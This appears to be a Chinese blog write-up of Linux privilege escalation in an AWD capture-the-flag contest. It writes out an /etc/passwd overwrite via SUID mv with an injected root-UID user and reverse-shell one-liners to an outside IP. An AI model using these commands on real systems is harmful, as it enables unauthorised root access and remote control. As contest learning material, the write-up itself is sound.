记一次 AWD 比赛中曲折的 Linux 提权

已于 2024-03-05 09:24:45 修改
阅读量1.7k 收藏 5
点赞数 4
分类专栏: 漏洞复现与原理分析 文章标签: linux 运维 服务器
于 2023-10-31 00:09:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haduwi/article/details/134130284
版权

前提背景:

今天一场 AWD 比赛中,遇到一个场景:PHP网站存在SQL注入和文件上传漏洞, MYSQL当前用户为ROOT,文件上传蚁剑连接SHELL是权限很低的用户。我需要想办法进行提权,才能读取到 /root 目录下的 flag。

一、sqlmap --os-shell 提权

在这里插入图片描述
看到当前用户是DBA都会想着 --os-shell 提权拿shell, 然后直接读取 /root 里面的 flag。 然而我试了半天,一直无法获取shell, 卡在无法写入文件。查阅资料发现自己一直对数据库的root有误解:

  • DBA(Database Administrator)通常是数据库管理员的角色,负责管理数据库的配置、性能优化、安全性等任务。然而,DBA 和操作系统中的 root 用户不是同一个概念,它们有不同的权限和责任。
  • 在数据库管理系统中,root 用户是具有最高权限的用户,可以执行所有管理任务,包括创建、删除、修改数据库对象以及用户帐户。但是,root 用户在操作系统层面没有访问操作系统文件系统的权限,包括读取操作系统的 root 目录。
  • 使用 sqlmap -os-shell 可能导致获取到与目标系统相关的命令执行权限,但这与操作系统的 root 权限无关。-os-shell 的具体权限取决于目标系统上正在运行的 Web 应用程序的用户权限,而不是数据库的 root 权限。

综上,此法无效。

二、内核提权:

目标服务器版本信息:

在这里插入图片描述

运行 linux-exploit-suggester.sh 脚本根据当前linux版本查询可利用内核提权程序

在这里插入图片描述

下载了好几个截图中内核提权的.c源代码进行编译,然而没一个有用,不想找了,遂放弃。

三、SUID 提权:

SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限,那么该执行程序运行的时候将拥有ROOT权限。

ps:常见的suid提权文件:nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

使用开源工具 suidcheck.sh 自动分析具有 s 权限的可执行文件:

在这里插入图片描述
存在 mv 命令,利用 mv 提权:

(www-data:/var/www/html/uploads) $ cat /etc/passwd > passwd
(www-data:/var/www/html/uploads) $ openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0

在这里插入图片描述构造成: hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash 插入 passwd

在这里插入图片描述mv 移动 passwd 覆盖 /etc 下的 passwd:

在这里插入图片描述

使用 su hack 进行用户切换,提示:su: must be run from a terminal

在这里插入图片描述

查阅资料解决方法:python -c 'import pty; pty.spawn("/bin/bash")' ,但是我输入一直报错,非常难受…

在这里插入图片描述

我怀疑是蚁剑的问题,我又换上了我的哥斯拉,依旧是这样。我在想要不试试反弹个shell, 因为蚁剑,哥斯拉都是php落地文件执行命令,不是一个shell。

反弹shell 命令:bash -i >/dev/tcp/43.136.46.254/1333 0>&1

在这里插入图片描述

又报错了:/bin/sh: 1: cannot create /dev/tcp/43.136.46.254/1333: Directory nonexistent

难道思路又错了??我特么就不信了,在 Stackoverflow论坛里找到相关解决方案:

使用shell执行脚本有两种方式,分别是 bash xxx.sh 和 bash -c “cmd string”。根据报错信息可知,目标主机使用的是sh,是bash的精简版本,相当于bash --posix 模式。Posix 标准 shell 不提供此功能,这个特性很奇怪,假装有一个/dev/tcp/目录。
解决办法:以后默认使用bash -c “cmd string” 进行反弹shell。如: bash -c ‘exec bash -i >& /dev/tcp/ip/port <&1’

在这里插入图片描述

ps: 成功反弹shell,值得注意的是: 有时候会报错,建议尝试执行1-3遍。

在自己的服务器上执行 python 脚本:python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

无报错,执行 su hack 切换用户,并输入密码:

在这里插入图片描述

提权成功!开始读取 /root 下的 flag:

在这里插入图片描述

m0rta1
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
[Bugku-AWD专版]一款用于AWD比赛的自动化攻击框架.zip
09-30
比赛项目代码
Linux提权总结全面(自学)
m0_64481831的博客
03-24 968
所谓提权就是指将低权限的账户转换为高权限账户,通过获取高权限账户去做需要高权限才能做的事情。对于Linux内核提权,有一些内核漏洞需要使用到本地用户去提权,有些漏洞可以无视任何权限都可以进行提权
红蓝对抗-AWD全流程攻略02(Linux基础)
最新发布
m0_67189356的博客
04-26 719
本文录了在AWD 攻防对抗linux系统常用到的一些命令
getshell神器-蚁剑,包含Linux windows双系统
08-10
内涵linux,windows双版本安装,最新最全的蚁剑安装包,强推建议收藏!!!!!
sqlmap提权
m0_51822230的博客
05-17 4240
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
Sqlmap使用及提权
qq_43757105的博客
10-16 9038
目录 一、获取账密 ​二、Sqlmap提权 ​ 一、获取账密 检查注入点,发现存在sql注入 --dbs 检查数据库名 --current-user 当前连接数据库的用户名 --current-db 当前连接数据库的名字 -D "数据库名" 指定目标数据库名 --tables 列出数据库所有的表名 -T "cms_...
docker使用过程遇到的Linux的su命令
libra0的博客
03-30 3499
遇到的Linux的su命令 linux环境下,常常需要我们切换用户,通过不同的权限,可以控制系统的安全性。所以例如ES会明确要求不能用root用户进行开发。 于是我们需要使用su命令切换用户。 然而在使用docker的过程,我遇到了一个问题。 问题描述: 通过docker run -td name /bin/bash搭建一个容器以后,使用docker exec -it id /bin...
【CI】must be run from a terminal
tiandaochouqin99的博客
11-15 2845
这里在登录docker 容器时,遇到了权限不足。解决办法时切换成root 身份登录 jenkins@3ec4412484f8:/$ su - root su: must be run from a terminal jenkins@3ec4412484f8:/$ cd /root bash: cd: /root: Permission denied jenkins@3ec4412484f8:/$...
一个线下 AWD 比赛的自动化工具.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
AWD攻防比赛 webshell
04-01
webshell,通过网页获取主机资源
CTF AWD比赛工具收集.zip
09-30
比赛项目源码
CTF和AWD比赛使用的题目的docker环境.zip
09-30
比赛项目源码
第二十四天 (重要!)在vulnhub得到的小知识
weixin_46653764的博客
07-17 468
1、SSH ssh 是一种安全网络协议(远程登录) 通过SSH,可以把所有传输的数据进行加密,也能够防止DNS欺骗和IP欺骗。还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。 (1)口令登录 ssh 客户端用户名@服务器ip地址 ssh ldz@192.168.0.1 SSH服务的默认端口是22,也就是说,如果你不设置端口的话登录请求会自动送到远程主机的22端口。我们可以使用 -p 选项来修改端口号,比如连接到服务器的1234端口 ssh -p 1234 ldz@192.168.0
解决shell脚本su需要动态交互的问题
BTingKing的博客
11-04 489
想用shell脚本自动部署系统,但是由于需要途切换到其他用户,所有需要使用su命令进行切换,这时就需要手动输入密码。其实很多难题之所以会难到我们,可能是因为我们掉入了自己的惯性思维。这个时候就要多问问自己是否还有其他的方法。其gnome-terminal是打开新的终端命令, sshpass和ssh是远程登陆命令。:通常网上有很多解决方法,绝大多数会出现如下类似的问题。
must be run from a terminal
lixixi
07-19 8825
这里在登录docker 容器时,遇到了权限不足。解决办法时切换成root 身份登录 jenkins@3ec4412484f8:/$ su - root su: must be run from a terminal jenkins@3ec4412484f8:/$ cd /root bash: cd: /root: Permission denied jenkins@3ec4412484f8:/$...
Linux一些常用命令
binyao02123202的专栏
06-20 5432
<br />    1.文本搜索<br />         grep 'SSL' /home/yaobin/software/php-mysql-apache/httpd-2.2.12/docs/conf/httpd.conf<br />     2.文件检索<br />         find / -name "201012023335251.jpg" -ls<br />     3.选一行<br /><br />     关掉防火墙<br />     service iptables
反弹shell
soldi_er的博客
04-16 3268
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
SQLMAP工具详解
weixin_56218159的博客
06-02 4244
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
内网渗透拿掉shell后提升权限的几个小思路--洪水猛兽
weixin_42665738的博客
09-09 1519
成功上传webshell后提升权限的几个小思路 思路一:想办法获得Administrator密码 使用getpass直接获取并破解密码: 如果getpass被查杀,可以使用PwDump7.exe或者QuarksPwDump.exe得到密码的NTML哈希值,然后再去各种MD5网站解密。 如果得到密码的NTML哈希无法破解,可以采用彩虹表爆破的方式,爆破出Administrator的密码:保存扫描出的NTML哈希值->使用ophcrack(去官网下载字典库https://ophcrack.so
awd比赛后门通用脚本
10-16
AWD(Attack With Defense)比赛是一种以攻击与防守相结合的网络安全竞赛。比赛使用的后门通用脚本是指用于在攻击者控制的主机上安装和管理后门,以达到控制目标系统的目的。通常,这样的脚本具有以下特点: 1. 后门安装:该脚本能够在目标主机上安装后门程序,通常是通过利用已知或未知的漏洞来获取系统访问权限。安装后门的方式可以有多种,如利用弱口令、利用系统漏洞等。 2. 远程管理:脚本提供了远程管理后门的功能,攻击者可以通过指定的命令或入口来访问、控制后门。这样,攻击者可以执行各种操作,包括文件上传、文件下载、命令执行等。 3. 隐藏性:为了避免被目标系统的安全工具检测到,后门通用脚本通常会具有一定的隐藏性。例如,可以隐藏在系统可执行文件、服务、注册表等位置,通过修改文件属性或命令行参数等方式来掩盖自身的存在。 4. 持久性:为了实现长期控制目标系统的目的,后门通用脚本会在系统启动时自动运行,并在后台持续执行。同时,它还会添加自启动项或修改系统配置文件,以保证后门的持久性。 5. 兼容性:通用脚本要具备较好的兼容性,能够适应不同操作系统、不同版本的环境。因此,脚本会进行环境检测,根据目标系统的特征自动选择合适的攻击方式和后门类型。 需要注意的是,使用后门通用脚本进行攻击是非法和道德上不可接受的行为。这种行为侵犯了他人的隐私和安全,在现实生活是严重被打击的。在网络安全领域,应当强调合法、合规的操作和防御手段,遵循法律法规和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

m0rta1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值